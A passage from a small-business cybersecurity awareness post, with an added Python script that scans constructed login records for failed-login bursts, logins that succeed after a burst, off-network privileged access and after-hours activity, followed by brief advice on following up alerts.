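The monitoring this section calls for, and the "monitor user activity, follow up on anomalies" advice in tip 4, as one added example that is not part of the original post. The script is written for this article and is not any product's detection engine: it reads login records in a constructed key=value format and raises the alerts a small business can actually act on: a burst of failed logins, a success right after such a burst, a privileged account used from outside the office or VPN, and logins outside business hours. The network ranges, the business-hours window, the thresholds and the sample log lines are all assumptions made for the demonstration.

```python
"""Added example (not from the original post): detection rules run over
login records, covering the 'monitor user activity and follow up on
anomalies' advice in tip 4 and the monitoring needed for tip 10. The log
format, network ranges, business hours and the sample lines are constructed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

INTERNAL_NETS = [ip_network("192.168.1.0/24"), ip_network("10.8.0.0/24")]  # assumed LAN + VPN pool
BUSINESS_HOURS = range(6, 21)                    # 06:00-20:59 UTC, assumed
FAIL_THRESHOLD, FAIL_WINDOW = 5, timedelta(minutes=10)


def parse(line):
    """'<ISO timestamp> key=value ...' -> dict with a datetime under 'ts'."""
    ts, rest = line.split(" ", 1)
    event = dict(field.split("=", 1) for field in rest.split())
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect(lines):
    """Return (timestamp, user, source, message) alerts in log order."""
    alerts = []
    recent_failures = defaultdict(deque)   # user -> timestamps of failures in the window
    burst_users = set()                    # users whose burst has not yet been followed by a success
    for ev in map(parse, lines):
        user, ts, src = ev["user"], ev["ts"], ip_address(ev["src"])
        if ev["result"] == "fail":
            window = recent_failures[user]
            window.append(ts)
            while ts - window[0] > FAIL_WINDOW:      # drop failures older than the window
                window.popleft()
            if len(window) == FAIL_THRESHOLD:        # fire once, when the threshold is reached
                alerts.append((ts, user, src,
                               f"login failure burst ({FAIL_THRESHOLD} failures within "
                               f"{FAIL_WINDOW.seconds // 60} minutes)"))
                burst_users.add(user)
            continue
        # successful login
        if user in burst_users:
            alerts.append((ts, user, src, "successful login after a failure burst: possible compromise"))
            burst_users.discard(user)
        if ev.get("priv") == "yes" and not any(src in net for net in INTERNAL_NETS):
            alerts.append((ts, user, src, "privileged login from outside the network"))
        if ts.hour not in BUSINESS_HOURS:
            alerts.append((ts, user, src, "login outside business hours"))
    return alerts


def alert_summary(lines):
    """(user, message) pairs, convenient for a daily review or a test."""
    return [(user, msg) for _, user, _, msg in detect(lines)]


# Constructed sample log: normal morning activity, then a password-guessing
# run against bob that eventually succeeds, then an admin logging in at 3am
# from an address that is neither the office nor the VPN.
SAMPLE_LOG = """\
2024-05-06T08:02:11Z user=alice result=ok src=192.168.1.20 priv=no
2024-05-06T08:15:40Z user=bob result=ok src=10.8.0.5 priv=no
2024-05-06T09:00:01Z user=admin-carol result=ok src=192.168.1.50 priv=yes
2024-05-06T22:31:05Z user=bob result=fail src=203.0.113.9 priv=no
2024-05-06T22:31:09Z user=bob result=fail src=203.0.113.9 priv=no
2024-05-06T22:31:14Z user=bob result=fail src=203.0.113.9 priv=no
2024-05-06T22:31:20Z user=bob result=fail src=203.0.113.9 priv=no
2024-05-06T22:31:27Z user=bob result=fail src=203.0.113.9 priv=no
2024-05-06T22:32:02Z user=bob result=ok src=203.0.113.9 priv=no
2024-05-07T03:12:44Z user=admin-carol result=ok src=198.51.100.23 priv=yes
""".splitlines()

if __name__ == "__main__":
    for ts, user, src, msg in detect(SAMPLE_LOG):
        print(ts.isoformat(), user, src, msg)
```

Each alert here is something a person should follow up the same day: the bob sequence is the classic sign of a guessed password and should trigger a reset and a look at what that session did, and an administrator logging in from an unknown address at 03:12 is either a tired admin or an incident. Feeding the script logs that an intruder cannot erase is what makes the second case detectable at all.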
Take Action to Keep Your Business Uninterrupted
Cybersecurity Awareness Month is here to remind every business that there are simple, effective ways to stay safe online and to protect their data from cybercrime. Use our Top 10 Cybersecurity Tips to assess, update, and improve your cyber defense plan.
Stay vigilant, stay secure, and make cybersecurity a fundamental part of daily focus to keep your business uninterrupted.
For more information about this topic, take a look at our Cybersecurity Awareness Month infographic